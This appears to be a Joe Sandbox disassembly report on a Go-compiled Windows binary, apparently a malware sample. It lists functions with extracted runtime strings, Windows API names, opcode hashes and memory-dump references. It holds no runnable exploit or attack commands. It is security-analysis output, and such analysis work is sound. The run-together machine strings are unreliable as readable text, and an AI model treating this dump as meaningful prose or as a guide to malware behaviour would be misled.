AvestanBengaliBrailleChanDirCopySidCypriot$sse41sse42ssse3sudogsweeptraceuint8usagewrite B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetAC
API String ID: 0-2882792389
Opcode ID: 23794b508a40ebb9a7acbb54afc2f4d16acbd0d63bb714137faecc4da4a56de3
Instruction ID: e5da72312165e3fd564d3b30e2d2acccae9a5b913ac7608361d3649d9b2acee7
Opcode Fuzzy Hash: 23794b508a40ebb9a7acbb54afc2f4d16acbd0d63bb714137faecc4da4a56de3
Instruction Fuzzy Hash: B632B97A204A48D5FB10DF25E845B993BB1F745B84F8A4627DA9D87326EF7EC249C300

Function 00A7DF80 Relevance: 7.7, Strings: 6, Instructions: 182COMMON

Download Yara Rule

Strings

found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32, xrefs: 00A7E185
greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close , xrefs: 00A7E22F
+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??, xrefs: 00A7E1A5
runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stackstring concatenation too lon, xrefs: 00A7E165
basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578, xrefs: 00A7E1DB
marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value, xrefs: 00A7E21E

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32$+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??$basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578$greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close $marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value.Bytesreflect.Value$runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stackstring concatenation too lon
API String ID: 0-2941174794
Opcode ID: 22023e422380b32bec80bdf4583a62e05e22c2d70926d624eddc7a005197202d
Instruction ID: db655861a17fd2829541be83121ef185befe65bee2827fe2d6e2ef9fd2a0564c
Opcode Fuzzy Hash: 22023e422380b32bec80bdf4583a62e05e22c2d70926d624eddc7a005197202d
Instruction Fuzzy Hash: 6371BCB2718B80C6DB10DB21E94139EBBA5F789B84F889166EF8D07B66CB78C554C740

Function 00A96DC0 Relevance: 7.6, Strings: 6, Instructions: 149COMMON

Download Yara Rule

Strings

e+, xrefs: 00A96F60
-, xrefs: 00A96F6C
-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpath, xrefs: 00A96E12
+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopen, xrefs: 00A96E2F
-, xrefs: 00A96E91
., xrefs: 00A96F5B

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: +Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopen$-$-$-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpath$.$e+
API String ID: 0-2958008275
Opcode ID: cc33b5564551b542f92f840616a0524201a2c2fa64233b59d5bf4bfa2caefe1d
Instruction ID: 854d7961d1a594afa389e30bab966ec6c3038ca1172e488c7928c0550899390c
Opcode Fuzzy Hash: cc33b5564551b542f92f840616a0524201a2c2fa64233b59d5bf4bfa2caefe1d
Instruction Fuzzy Hash: CB517B67B1DA84C9CF13DB35E05131AF7A1AFE63C4F04C752EA4E266A6D72CC18A8700

Function 00A73880 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

with GC prog,M3.2.0,M11.1.0476837158203125: no frame (sp=<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGetAdaptersInfoGetCo, xrefs: 00A739D4
runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18startm: , xrefs: 00A739EA, 00A73A8F
runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratoracquireSudo, xrefs: 00A73AA5
but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWe, xrefs: 00A73A65
of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame, xrefs: 00A73A45
runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectime: Stop called on uninitialized Timer34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorattempted to add zero-sized address rangebinary: varint ov, xrefs: 00A739B4, 00A73A25

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWe$ of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame$ with GC prog,M3.2.0,M11.1.0476837158203125: no frame (sp=<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGetAdaptersInfoGetCo$runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18startm: $runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectime: Stop called on uninitialized Timer34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorattempted to add zero-sized address rangebinary: varint ov$runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratoracquireSudo
API String ID: 0-3288062605
Opcode ID: ef9e6417103f31f237b748ecf54f9886d60333f2c6d7cb819a681e51fe10ae7a
Instruction ID: 169c57c9e5e20882ad4b1c5ef56919c60bd3878826f739ef10b5bc9b058cd8d2
Opcode Fuzzy Hash: ef9e6417103f31f237b748ecf54f9886d60333f2c6d7cb819a681e51fe10ae7a
Instruction Fuzzy Hash: DD515936618F8486DB10AF15E98135EBBB4F789B80F999121EF8D07B26CF38C654DB11

Function 00A6C940 Relevance: 7.6, Strings: 6, Instructions: 117COMMON

Download Yara Rule

Strings

s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.PointeruserArenaStatewinapi error #work.full != 0 with GC prog,M3.2.0,M11.1.0476837, xrefs: 00A6CA45
s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076, xrefs: 00A6CA8F
s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFile, xrefs: 00A6CA65, 00A6CAE5
s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call, xrefs: 00A6CB0F
freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not suppo, xrefs: 00A6CAA5
runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc1164153, xrefs: 00A6CAC5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTimeGetFile$freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not suppo$runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc1164153$s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call$s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076$s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.PointeruserArenaStatewinapi error #work.full != 0 with GC prog,M3.2.0,M11.1.0476837
API String ID: 0-1661197662
Opcode ID: 989ae71c266ced0cdd5babb699826046d7bc22361f050e2c8935ea396fddf07e
Instruction ID: 991a60b426f1277f77d603868296ca68ed8193289127677e5919d5465819588a
Opcode Fuzzy Hash: 989ae71c266ced0cdd5babb699826046d7bc22361f050e2c8935ea396fddf07e
Instruction Fuzzy Hash: 60515D32219B80C6CB10EB55E98136EBBB4FB99B90F449552FACD07B26DF38C944CB50

Function 00A77082 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2581888759
Opcode ID: 3baffa0df9638387ad4caaf818afbcbcb4dc41120173b41fde7a5d216ba04f09
Instruction ID: 936f34bd546eb6a125fa7a492478a4ed3654b6db83e2e88444a70a41d0a426bd
Opcode Fuzzy Hash: 3baffa0df9638387ad4caaf818afbcbcb4dc41120173b41fde7a5d216ba04f09
Instruction Fuzzy Hash: 84419032309F8491E724AB62E94179EBBA5F784BC0F48C532DA8D97B59DF78C855C340

Function 00A77064 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
